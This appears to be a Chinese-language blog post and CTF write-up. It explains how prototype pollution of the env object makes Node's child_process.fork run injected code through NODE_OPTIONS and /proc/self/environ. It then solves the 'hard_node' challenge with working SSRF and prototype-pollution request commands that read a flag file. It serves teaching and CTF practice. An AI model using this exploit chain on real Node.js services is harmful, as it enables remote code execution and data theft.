Skip to content

Node.js child_process.fork 与 env 污染 RCE

Published: at 23:52

Node 从8.0 开始支持 NODE_OPTIONS,而 Node 的参数中有一项名为 --require,可以加载执行一段 JavaScript 代码。这就是一切的起源。

ToC

当 NODE_OPTIONS 遇到 fork

我们先来看一下 child_process.fork 的源码:

1
function fork(modulePath /* , args, options */) {
2
validateString(modulePath, "modulePath");
3
4
// Get options and args arguments.
5
let execArgv;
6
let options = {};
7
let args = [];
8
let pos = 1;
9
if (pos < arguments.length && ArrayIsArray(arguments[pos])) {
10
args = arguments[pos++];
11
}
12
13
if (
14
pos < arguments.length &&
15
(arguments[pos] === undefined || arguments[pos] === null)
16
) {
17
pos++;
18
}
19
20
if (pos < arguments.length && arguments[pos] != null) {
21
if (typeof arguments[pos] !== "object") {
22
throw new ERR_INVALID_ARG_VALUE(`arguments[${pos}]`, arguments[pos]);
23
}
24
25
options = { ...arguments[pos++] };
26
}
27
28
// Prepare arguments for fork:
29
execArgv = options.execArgv || process.execArgv;
30
31
if (execArgv === process.execArgv && process._eval != null) {
32
const index = execArgv.lastIndexOf(process._eval);
33
if (index > 0) {
34
// Remove the -e switch to avoid fork bombing ourselves.
35
execArgv = execArgv.slice();
36
execArgv.splice(index - 1, 2);
37
}
38
}
39
40
args = execArgv.concat([modulePath], args);
41
42
if (typeof options.stdio === "string") {
43
options.stdio = stdioStringToArray(options.stdio, "ipc");
44
} else if (!ArrayIsArray(options.stdio)) {
45
// Use a separate fd=3 for the IPC channel. Inherit stdin, stdout,
46
// and stderr from the parent if silent isn't set.
47
options.stdio = stdioStringToArray(
48
options.silent ? "pipe" : "inherit",
49
"ipc"
50
);
51
} else if (!options.stdio.includes("ipc")) {
52
throw new ERR_CHILD_PROCESS_IPC_REQUIRED("options.stdio");
53
}
54
55
options.execPath = options.execPath || process.execPath;
56
options.shell = false;
57
58
return spawn(options.execPath, args, options);
59
}

看到第 52 行。当 options 中没有 execPath 中,fork 会尝试使用 process.execPath,也就是 node 本身。如果我们还可以控制 options.env,那就可以在 fork 执行之前先执行一段我们想要执行的代码。

原型链注入

原型链注入是老生长谈的 Node 安全漏洞了。这次,我们需要通过它写入 env,以在 fork 时传入环境变量。

通过注入 __proto__.env,向其中写入:

1
{
2
"NODE_OPTIONS": "--require path/to/file.js"
3
}

我们就可以执行对应的 JavaScript 了。那如果不能借助文件,我们又该怎么办呢?

/proc

通过 /proc/self/environ,我们可以读取当前的环境变量。于是,我们就可以通过将代码写到环境变量里,达到执行任意代码的目的。我们将上面的 payload 修改成下面的形式:

1
{
2
"AAAA": "console.log("2333")//",
3
"NODE_OPTIONS": "--require /proc/self/environ"
4
}

就可以在 fork 之前向控制台打印出 2333 了。这里的 AAAA 是为了让这条环境变量在 /proc/self/environ 中能显示在最前,而后面的 // 则是为了注释掉之后的内容,防止执行出现问题。AAAA// 的配合使得只有我们希望的代码被执行,提高了破坏力。

实战

这题据 CTFHub 说是 2020 第五空间决赛的 Web 题,名字是 hard_node,在 CTFHub 上可以找到。但 CTFHub 上没给源码,所以这里附一下源码。

app.js
1
const express = require("express");
2
const bodyParser = require("body-parser");
3
const proc = require("child_process");
4
const request = require("request");
5
const ip = require("ip");
6
const manage = require("./manage.js");
7
const path = require("path");
8
9
const app = express();
10
app.use(bodyParser.urlencoded({ extended: true }));
11
app.use(bodyParser.json());
12
13
app.use(express.static(path.join(__dirname, "public")));
14
15
//stop hackers
16
const disallowedKeys = [
17
"__proto__",
18
"prototype",
19
"constructor",
20
"eval",
21
"proccess",
22
"root",
23
"global",
24
"exec",
25
"!",
26
"fs",
27
];
28
29
function isValidPath(segment) {
30
disallowedKeys.forEach(evilWord => {
31
if (segment.toString().indexOf(evilWord) !== -1) {
32
return false;
33
}
34
});
35
36
return true;
37
}
38
39
app.post("/add", (req, res) => {
40
let ip = req.ip;
41
console.log(ip.m);
42
if (ip.substr(0, 7) == "::ffff:") {
43
ip = ip.substr(7);
44
}
45
console.log(`method:${req.method},serverip:${server_ip},ip:${ip}`);
46
47
if (ip != "127.0.0.1" && ip != server_ip) {
48
res.status(403).send("Not Edit from Local!");
49
} else {
50
if (req.body.userName && req.body.nameVal) {
51
let username = req.body.userName;
52
let nameVal = req.body.nameVal;
53
54
if (!isValidPath(username) || !isValidPath(nameVal)) {
55
username = "username";
56
nameVal = "guest";
57
}
58
59
manage.set(object, username, nameVal);
60
console.log(ip.k);
61
console.log(object);
62
63
res.send(`
64
<h1>Edit Success</h1>
65
<a href="/admin">View Admin Page</a>`);
66
} else {
67
res.send("param error");
68
}
69
}
70
});
71
72
app.get("/admin", (req, res) => {
73
if (manage.get(object, "username", "guest") === "admin") {
74
console.log("Current User:" + object.username);
75
76
const child = proc.fork(`${__dirname}/public/user.js`, ["admin"]);
77
child.on("message", body => {
78
res.status(200).send(body);
79
});
80
child.on("close", (code, signal) => {
81
console.log(`subproccess ended with ${signal}`);
82
});
83
} else {
84
res.status(403).send("Only Admin Can View this");
85
}
86
});
87
88
app.get("/getContent", (req, res) => {
89
res.sendfile(`${__dirname}/public/guest.html`);
90
});
91
92
app.get("/", (req, res) => {
93
// console.log(req.body)
94
let uri = req.query.url ? req.query.url : "http://127.0.0.1:3000/getContent";
95
console.log(uri);
96
97
try {
98
request.get(uri, (err, response, data) => {
99
if (!err && response.statusCode == 200) {
100
res.send(data);
101
} else {
102
console.log(err);
103
}
104
});
105
} catch (e) {
106
console.log(e);
107
} finally {
108
console.log("Make Server Continue Running");
109
}
110
});
111
112
var object = { username: "guest" };
113
var server_ip = ip.address();
114
115
app.listen(3002);
116
console.log(`${server_ip} is starting at port 3000`);
manage.js
1
const isObj = require("is-obj");
2
3
var manage = {
4
getPathSegments: function (path) {
5
const pathArray = path.split(".");
6
const parts = [];
7
8
for (let i = 0; i < pathArray.length; i++) {
9
let p = pathArray[i];
10
11
while (p[p.length - 1] === "\\" && pathArray[i + 1] !== undefined) {
12
p = p.slice(0, -1);
13
p += pathArray[++i];
14
}
15
16
parts.push(p);
17
}
18
19
return parts;
20
},
21
22
get: function (object, path, value) {
23
if (!isObj(object) || typeof path !== "string") {
24
return value === undefined ? object : value;
25
}
26
27
const pathArray = this.getPathSegments(path);
28
29
for (let i = 0; i < pathArray.length; i++) {
30
if (!Object.prototype.propertyIsEnumerable.call(object, pathArray[i])) {
31
return value;
32
}
33
34
object = object[pathArray[i]];
35
36
if (object === undefined || object === null) {
37
if (i !== pathArray.length - 1) {
38
return value;
39
}
40
break;
41
}
42
}
43
44
return object;
45
},
46
47
set: function (object, path, value) {
48
Object.keys(Object.prototype).forEach(function (Val) {
49
if (!Object.hasOwnProperty(Val)) {
50
delete Object.prototype[Val];
51
console.log(`${Val} is delete`);
52
}
53
});
54
55
if (!isObj(object) || typeof path !== "string") {
56
return object;
57
}
58
59
const root = object;
60
const pathArray = this.getPathSegments(path);
61
62
for (let i = 0; i < pathArray.length; i++) {
63
const p = pathArray[i];
64
65
if (!isObj(object[p])) {
66
object[p] = {};
67
}
68
69
if (i === pathArray.length - 1) {
70
object[p] = value;
71
}
72
73
object = object[p];
74
}
75
76
return root;
77
},
78
};
79
80
module.exports = manage;

可以看到,manager.jsset 存在明显的原型链注入,而通过 getPathSegments 又可以以 \\. 的方式绕过黑名单的检测。

我们发现,修改信息只能通过 /add 进行,这里有一个内网限定访问,可以使用 requesthar 来实现:

Terminal window
1
http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "username", "nameVal": "admin"}' 'url[har][postData][mimeType]'=='application/json'

然后执行写入要执行的代码:

Terminal window
1
http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "__pr\\\\.oto__.env", "nameVal": {"A": "process.send(require('\''child_process'\'').execSync('\''cat /flag'\''))//", "NODE_OPTIONS": "--require /proc/self/environ"}}' 'url[har][postData][mimeType]'=='application/json'

最后访问 /admin 就可以了。

(最后从 CTFHub 上把源码偷下来了:https://drive.google.com/file/d/1z6zT48OI7zeUjWwIJvma66_2ZGIMz1M2/view?usp=sharing

参考

  1. https://xz.aliyun.com/t/6755
  2. https://blog.szfszf.top/article/47/
  3. https://github.com/mpgn/CVE-2019-7609